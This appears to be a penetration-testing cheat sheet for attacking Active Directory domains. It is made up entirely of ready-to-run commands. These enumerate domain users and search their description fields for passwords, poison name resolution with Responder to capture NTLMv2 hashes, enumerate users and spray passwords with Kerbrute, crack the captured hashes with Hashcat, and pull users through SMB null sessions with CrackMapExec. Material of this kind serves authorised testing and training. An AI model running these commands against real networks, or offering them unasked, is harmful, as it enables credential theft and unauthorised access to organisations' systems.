Skip to main content

Active Directory

Powershell

Load the built-in Active Directory PowerShell module

PowerShell
Import-Module ActiveDirectory

List domain users using Get-ADUser and filter by the username

PowerShell
Get-ADUser -Filter * | select Name

Check the description field of domain users for sensitive data such as passwords

PowerShell
Get-DomainUser * | Select-Object samaccountname,description

Responder

Analysis mode

sudo responder -I <interface> -A

Response spoofing to gather NTLMv2 password hashes

sudo responder -I <interface> -w -d

Kerbrute

Enumerate valid Active Directory users for password spraying

kerbrute userenum -d <domain> --dc <ip> jsmith.txt -o kerb-results
kerbrute passwordspray -d <domain> --dc <ip> valid_users.txt <password>

Hashcat

Crack an NTLMv2 hash gathered with Responder

hashcat -m 5600 <hash> <wordlist>

CrackMapExec

Enumerate the domain password policy

crackmapexec smb <ip> -u <user> -p <password> --pass-pol

SMB NULL sessions on a dc host and enumerate valid users

crackmapexec smb <ip> -u '' -p '' --users --export $(pwd)/users.txt